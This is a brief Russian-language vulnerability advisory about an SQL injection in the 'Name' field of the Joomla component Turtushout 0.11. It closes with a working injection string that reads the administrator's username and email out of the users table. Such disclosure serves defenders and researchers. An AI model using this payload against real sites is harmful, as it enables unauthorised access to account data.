Программа: Joomla Component Turtushout 0.11

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в поле «Name». Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

Эксплоит:

test’, ‘0.0.0.0’ ), ( ‘test’, ( SELECT CONCAT( username, 0x20, email ) FROM #__users
WHERE gid=25 limit 1 ), ‘2009-08-07 13:52:38’, 0, ‘test’, ‘0.0.0.0’ ) — ‘



Оставить мнение